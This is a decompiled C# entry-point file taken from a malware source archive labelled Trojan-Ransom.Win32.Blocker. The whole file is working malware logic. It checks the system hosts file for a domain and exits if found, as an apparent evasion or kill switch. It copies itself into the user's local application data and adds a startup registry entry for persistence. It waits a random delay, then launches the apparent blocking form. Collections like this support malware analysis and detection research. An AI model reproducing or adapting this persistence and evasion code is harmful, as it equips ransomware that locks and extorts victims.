MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d/browser_bastan/Program.cs
2022-08-18 06:28:56 -05:00

47 lines
1.5 KiB
C#

// Decompiled with JetBrains decompiler
// Type: browser_bastan.Program
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
using SmartAssembly.MemoryManagement;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace browser_bastan
{
internal static class Program
{
public static Mutex AppMutex = new Mutex(true, "{8F6F0AC4-B9A1-45fd-A8CF-72F04X6FDCCM}");
[STAThread]
private static void Main()
{
MemoryManager.AttachApp();
if (Program.AppMutex.WaitOne(TimeSpan.Zero, true))
{
Program.CheckHostsFile();
string path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\" + Araclar.DstName;
Araclar.DstCheck();
Araclar.Startup(Araclar.Regkeyname, path);
Thread.Sleep(new Random().Next(5000, 60000));
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
Program.AppMutex.ReleaseMutex();
}
else
Environment.Exit(1);
}
public static void CheckHostsFile()
{
if (!File.ReadAllText(Environment.GetEnvironmentVariable("windir") + "\\system32\\drivers\\etc\\hosts").Contains("nurullahuzmez.com"))
return;
Environment.Exit(1);
}
}
}